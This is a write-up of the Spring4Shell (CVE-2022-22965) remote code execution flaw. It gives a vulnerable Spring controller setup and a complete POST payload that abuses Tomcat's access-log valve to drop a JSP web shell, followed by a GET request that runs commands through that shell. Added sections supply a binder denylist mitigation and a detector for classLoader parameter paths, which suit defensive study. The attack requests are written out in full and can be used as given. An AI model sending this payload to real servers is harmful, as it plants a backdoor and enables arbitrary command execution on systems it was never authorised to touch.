I. Exploitation prerequisites
- JDK 9+
- Spring and the frameworks derived from it
- The Spring project is deployed on Tomcat
- POJO parameter binding is used
- Spring Framework 5.3.x < 5.3.18, 5.2.x < 5.2.20, or other versions
II. Environment setup
- Java target range
- JDK 11 (must be 9 or above)
- Tomcat 8
1. First, an entity class is needed:
    public class HelloWorld {
        private String message;

        public String getMessage() {
            return message;
        }

        public void setMessage(String message) {
            this.message = message;
        }
    }
2. Then write a controller that takes this entity type as its parameter:
    @RestController
    @RequestMapping("/spring")
    public class SpringRce {
        @RequestMapping("/rce")
        public void vulnerable(HelloWorld model) {
        }
    }
3. Package the project as a war and deploy it to Tomcat: File -> Project Structure, then Build -> Build Artifacts to generate the war; put it in Tomcat's webapps directory and start Tomcat.
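For comparison, the hardened counterpart of the SpringRce controller above, as an added example that is not part of the original write-up: a global WebDataBinder denylist that refuses any property path starting at, or passing through, the "class" property of the bound POJO. This is the workaround Spring published for CVE-2022-22965 for deployments that cannot upgrade to 5.3.18 / 5.2.20 right away; the class and method names are placeholders chosen here.

```java
import org.springframework.core.Ordered;
import org.springframework.core.annotation.Order;
import org.springframework.web.bind.WebDataBinder;
import org.springframework.web.bind.annotation.ControllerAdvice;
import org.springframework.web.bind.annotation.InitBinder;

/**
 * Added example, not code from the original write-up. Applies to every controller in the
 * application, so the SpringRce.vulnerable(HelloWorld) binding above is covered without
 * touching the controller itself. Upgrading Spring Framework remains the actual fix.
 */
@ControllerAdvice
@Order(Ordered.LOWEST_PRECEDENCE) // ordering relative to other @ControllerAdvice beans
public class BinderControllerAdvice {

    @InitBinder
    public void denyClassLoaderTraversal(WebDataBinder dataBinder) {
        // Every path the exploit relies on (class.module.classLoader.resources.context.parent.
        // pipeline.first.* and the blind probe class.module.classLoader.defaultAssertionStatus)
        // begins with the "class" property. Before 5.3.18 the field patterns are matched
        // case-sensitively, so both spellings and both nesting forms are listed.
        String[] denylist = new String[] {"class.*", "Class.*", "*.class.*", "*.Class.*"};
        dataBinder.setDisallowedFields(denylist);
    }
}
```

One caveat when rolling this out: a controller that has its own @InitBinder method calling setDisallowedFields replaces the global list rather than extending it, so such controllers must include the same patterns themselves.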
III. Exploitation
1. Send the POC request. The first request uses the Tomcat access-log file to write a jsp shell under webapps/ROOT:
POST /java-sec/xstream HTTP/1.1
Cookie: JSESSIONID=0873A909194640CBAF9EEBC2283C6C97; XSRF-TOKEN=1d91ead1-6fa9-4f1d-b8c9-5cf57dc020b8; remember-me=YWRtaW46MTY1MjUxMTU2MjQ1MTo2M2U2NmNkZjdkOWNhZDAyMzMyMjhhMjAwN2NiZTc4YQ
suffix: %>//
c1: Runtime
c2: <%
DNT: 1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Upgrade-Insecure-Requests: 1
Host: localhost:8081
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.4 Safari/605.1.15
Accept-Language: zh-CN,zh-Hans;q=0.9
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Length: 757
class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=
2. Command execution: run arbitrary commands through tomcatwar.jsp:
GET /tomcatwar.jsp?pwd=j&cmd=hostname HTTP/1.1
Cookie: JSESSIONID=DF7BCBCC3317CB8B47DFD93C7F8D78FE; XSRF-TOKEN=08a2c187-4ca0-47df-8463-1189a6661f96; remember-me=YWRtaW46MTY1MjUzMjE2MTAxNTozODY1ZTMxOWU1NTg5NTMyYWZlNGQzNzhiN2Q4MGJjYg
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Upgrade-Insecure-Requests: 1
Host: localhost:8081
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.4 Safari/605.1.15
Accept-Language: zh-CN,zh-Hans;q=0.9
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Length: 0
IV. Use during testing
Black-box blind testing: pass a property under classLoader, class.module.classLoader.defaultAssertionStatus=123, and watch whether the server throws an exception.
White-box: the exploitation prerequisites above must be met, or find a controller that binds POJO parameters and then try.
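From the detection side, both the blind probe in this section and the two-stage request in section III share one signature: a form parameter whose name walks from the bound POJO's "class" property into the ClassLoader. The following is an added example (not from the original write-up) of a small checker that a WAF rule, a log-review script or a servlet filter could embed; the class name and the sample bodies are constructed here, and the sample bodies are shortened copies of the parameter names used above.

```java
import java.net.URLDecoder;
import java.nio.charset.StandardCharsets;
import java.util.ArrayList;
import java.util.List;
import java.util.regex.Pattern;

/** Added example, not code from the original write-up. Requires Java 10+ for URLDecoder.decode(String, Charset). */
public class ClassLoaderParamDetector {

    /** Any parameter name that reaches the ClassLoader through the bound object's "class" property. */
    private static final Pattern CLASSLOADER_PATH =
            Pattern.compile("(?i)(^|\\.)class\\.module\\.classLoader\\.");

    /** The AccessLogValve attributes that the section III request rewrites to drop a file. */
    private static final Pattern ACCESS_LOG_TAMPER =
            Pattern.compile("(?i)\\.pipeline\\.first\\.(pattern|suffix|directory|prefix|fileDateFormat)$");

    public static final class Finding {
        public final String name;
        public final String kind;
        Finding(String name, String kind) { this.name = name; this.kind = kind; }
        @Override public String toString() { return kind + ": " + name; }
    }

    /** Splits an application/x-www-form-urlencoded body (or query string) and decodes each parameter name. */
    static List<String> parameterNames(String body) {
        List<String> names = new ArrayList<>();
        if (body == null || body.isEmpty()) return names;
        for (String pair : body.split("&")) {
            int eq = pair.indexOf('=');
            String rawName = eq < 0 ? pair : pair.substring(0, eq);
            names.add(URLDecoder.decode(rawName, StandardCharsets.UTF_8));
        }
        return names;
    }

    /** One finding per suspicious parameter name; an empty list means nothing matched. */
    public static List<Finding> inspect(String body) {
        List<Finding> findings = new ArrayList<>();
        for (String name : parameterNames(body)) {
            if (!CLASSLOADER_PATH.matcher(name).find()) continue;
            String kind = ACCESS_LOG_TAMPER.matcher(name).find()
                    ? "access-log valve tampering (file write attempt)"
                    : "classloader property probe";
            findings.add(new Finding(name, kind));
        }
        return findings;
    }

    public static void main(String[] args) {
        // Constructed sample bodies: a benign bind of the HelloWorld POJO, the blind probe from
        // section IV, and shortened forms of the AccessLogValve rewrite from section III.
        String[] samples = {
            "message=hello",
            "class.module.classLoader.defaultAssertionStatus=123",
            "class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp"
                + "&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT"
                + "&class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar",
            "Class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di"
        };
        for (String body : samples) {
            List<Finding> findings = inspect(body);
            System.out.println((findings.isEmpty() ? "clean   " : "SUSPECT ") + findings + "  <= " + body);
        }
    }
}
```

The first sample is reported clean and the other three are flagged, the last two as access-log valve tampering. The checker only looks at dotted property paths, so it is a triage aid rather than a boundary: the binder denylist in section II (or the fixed Spring Framework release) is what actually closes the binding path, and any hit on the probe name alone is still worth an alert because it is the reconnaissance step that precedes the file write.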